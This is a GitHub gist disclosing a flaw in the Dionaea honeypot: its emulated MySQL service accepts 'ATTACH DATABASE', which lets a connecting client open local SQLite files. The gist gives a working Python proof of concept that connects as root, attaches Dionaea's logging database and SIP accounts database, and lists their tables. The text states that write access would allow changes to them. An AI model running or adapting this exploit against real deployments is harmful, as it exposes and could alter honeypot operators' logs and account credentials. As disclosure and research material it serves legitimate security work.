Skip to content

Instantly share code, notes, and snippets.

@ykoster
Created November 19, 2019 15:25
Show Gist options
  • Save ykoster/538a349b08ae528ac018aa74bd2f853e to your computer and use it in GitHub Desktop.
Save ykoster/538a349b08ae528ac018aa74bd2f853e to your computer and use it in GitHub Desktop.
Dionaea honeypot allows the "ATTACH DATABASE" command, which can be used to attach to any local SQLite database on which the Dionaea process has read access. If Dionaea has write access, it is even possible to make changes to the database. This includes the logging database (when used) and sipaccounts database.
#!/usr/bin/env python3
import MySQLdb
host = '127.0.0.1'
port = 3306
user = 'root'
passwd = 'passwd'
dbs = ['/opt/dionaea/var/lib/dionaea/dionaea.sqlite', '/opt/dionaea/var/lib/dionaea/sip/accounts.sqlite']
conn = MySQLdb.connect(host=host, port=port, user=user, passwd=passwd)
print(f'[\u001b[32m+\u001b[0m] Connected to {host}:{port}')
i = 0
for db in dbs:
cur = conn.cursor()
try:
cur.execute(f"ATTACH DATABASE '{db}' AS db{i}")
print(f'[\u001b[32m+\u001b[0m] Attached to database: {db}')
print(f'[\u001b[32m+\u001b[0m] Dumping table names:')
cur.execute(f"SELECT name FROM db{i}.sqlite_master WHERE type ='table' AND name NOT LIKE 'sqlite_%'")
for row in cur.fetchall():
print(f'[-] {row[0]}')
i += 1
finally:
cur.close()
conn.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment